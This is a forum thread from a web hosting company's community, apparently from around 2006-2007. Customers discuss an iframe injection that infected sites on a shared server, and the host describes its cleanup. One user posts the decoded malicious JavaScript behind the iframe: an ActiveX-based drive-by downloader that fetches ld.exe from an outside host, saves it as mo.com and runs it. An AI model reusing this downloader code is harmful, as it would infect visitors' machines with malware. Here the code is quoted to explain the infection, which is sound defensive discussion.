web hosting account infected with some sort of malware / virus!!!!!!!!!!

[thecheekymonkey]

ok, a few people have mailed me now with regards to my website hosting.


www. consoleworkshop.co.uk

(only click if you have firewall / antivirus installed)

basically as soon as you click on my website hosting, my AVG goes crazy saying that its found a threat (mo.com)

i`ll click heal and it will continuosly try to download it again and again.

not it aint my pc, as ive just freshly formatted it.
it isnt the antivirus software as ive tried
AVG internet security
AVG Page Ranking
Zone alarm
norton internet security
Panda


all the same, its either a threat or unknown virus.

searching the web has given me little info.


however i did find this pst on a forum

www. pcadvisor.co.uk/forums/index.cfm?action =showthread&threadid=267579&forumid=13



they seem to think its to do with the host.


driving me crazy this now, so can anyone help?

[daledavies]

your website hosting seems to work fine at my end, i use mcafee and its fully updated.

[DavidAllen]

Your website hosting is infected
Have a look at the source of your index.htm page
you will see a hidden iframe pointing to mortimercomprehensive
that is causing the problem - it is trying to d/load malware
see my thread in the resellers support forum Malware Links on Server
ALL accounts on that server have been compromised in a similar way. EUK have partially solved the problem - but are taking a very relaxed attitude to fixing it properly. My opinion of them is decending rapidly
Regards
David

[eUKhost.com]

Hello kieron,

What David has mentioned about the injection is right but the problem is sorted now. There was no way to replace the iframe code completely but we managed to modify the injected code to make it a 404 iframe. 404 iframe wont load and that way it wont make any problems.

Following command was ran successfully to modify the injected code :-

replace "mortimercomprehensive" "google" -- /home/username/public_html/index.*

&

replace "mortimercomprehensive" "google" -- /home/username/public_html/*/index.*

I wont agree with the other thing mentioned by David. I can provide you with the logs of kernel upgrades attempted in last 3 months and similar thing never happened in past. We are proud of knowledge of our system admins but it didn't work for jaguar.eukhost.com.

We paid other well known system admins as well but they had no success. Finally things got sorted on 26th Dec 2006 but some website hosting were still having the injection which didn't get replaced.

I can assure you that similar thing wont happen on jaguar.eukhost.com again for at least next 1 year as the kernel is good for next 1 year but we will have same problem again after 1 year. I'll ensure that we get the hardware replaced after 1 year coz we cannot afford to go through the same trauma once again.

To Mr. David: Things always look good from the other end but one who has to go through it knows the pain involved.

[DavidAllen]

At last EUK appear to have fixed the problem - It's only taken 3 weeks to run that replace command properly!!

The reason you noticed 'mo.com' is cos the link d/loads a file and calls it mo.com which it then tries to run.

If you follow the iframe links you'll find it leads to some encrypted code which translates as below:

Code:

html>

script type="text/javascript" language="javascript">
var i = 0;
var t = new Array(
'BD96C556-65A3-11D0-983A-00C04FC29E36',
'AB9BCEDD-EC7E-47E1-9322-D4A210617116',
'0006F033-0000-0000-C000-000000000046',
'0006F03A-0000-0000-C000-000000000046',
'6E32070A-766D-4EE6-879C-DC1FA91D2FC3',
'6414512B-B978-451D-A0D8-FCFDF33E833C',
'7F5B7F63-F06F-4331-8A26-339E03C0AE3D',
'06723E09-F4C2-43c8-8358-09FCD1DB0766',
'639F725F-1B2D-4831-A9FD-874847682010',
'BA018599-1DB3-44f9-83B4-461454C84BF8',
'D0C07D56-7C69-43F1-B4A0-25F5A11FAB19',
'E8CCCDDF-CA28-496b-B050-6C07C962476B'
);

function fgr() {
return true;
}
window.onerror = fgr;

function CreateO(o, n) {
var r = null;
try { eval('r = o.CreateObject(n)') }catch(e){}
if (! r) {
try { eval('r = o.CreateObject(n, "")') }catch(e){}
}
if (! r) {
try { eval('r = o.CreateObject(n, "", "")') }catch(e){}
}
if (! r) {
try { eval('r = o.GetObject("", n)') }catch(e){}
}
if (! r) {
try { eval('r = o.GetObject(n, "")') }catch(e){}
}
if (! r) {
try { eval('r = o.GetObject(n)') }catch(e){}
}
return(r);
}

function DoIt()
{
x.Open('GET','hxxp://mortimercomprehensive.co.uk/images/opennight/thumbs/tmp1/ld.exe',false);
x.Send();
var fname1 = 'mo.com';
var f = CreateO(xml,'Scripting.FileSystemObject');
var tmp = f.GetSpecialFolder(2);
fname1 = f.BuildPath(tmp,fname1);
S.open();
S.write(x.responseBody);
S.savetofile(fname1,2);
S.close();
var Q = CreateO(xml,'Shell.Application');
Q.ShellExecute(fname1,'','','open',0);
}

/script>
/head>
body>
script type="text/javascript" language="JavaScript">
if (navigator.userAgent.indexOf('MSIE') != -1) {
while (t[i]) {

var xml = null;

xml = document.createElement('object');
xml.setAttribute('classid','clsid:BD96C556-65A3-11D0-983A-00C04FC29E36');
n_xml = 'Microsoft.XMLHTTP';
var x = xml.CreateObject(n_xml,"");
a1 = 'ADO';
a2 = 'DB.';
a3 = 'Str';
a4 = 'eam';
str1 = a1 + a2 + a3 + a4;
str5 = str1;
if (xml) {
var S = CreateO(xml,str5);
if (S) {
S.type = 1;
str6 = 'GET';
DoIt();
}
}
}
}

[eUKhost.com]

It wont happen now as it will give a 404 ifram url which wont make any difference.

Not sure why support people were not able to run the replace command for internal subdirectories of accounts but this should be sufficient for me to forward to our CTO.

[DavidAllen]

you might also want to run the replace on index*.* as one of my website hostings had a file indexesp.htm infected

[eUKhost.com]

I did that but it found only one file ( indexold.htm ) inside one public_html of a customer. command could penetrate to one more directory only so anything thats 2 directories inside cannot be reached ( ex : public_html/subdirectory/otherdirectory/indexesp.htm )

[Chris]

Mark - seems as though server 64.38.20.134 may be infected as well.

There is an iframe with a strange link on the index.htm of aruncontrolsystems.co.uk

Please advise! I will raise a ticket!

[eUKhost.com]

Both servers had same configuration and both were setup at the same time. We managed to upgrade kernel on both on same day in the month of Dec 2006.

I've executed the replace command which has sorted this iframe injection.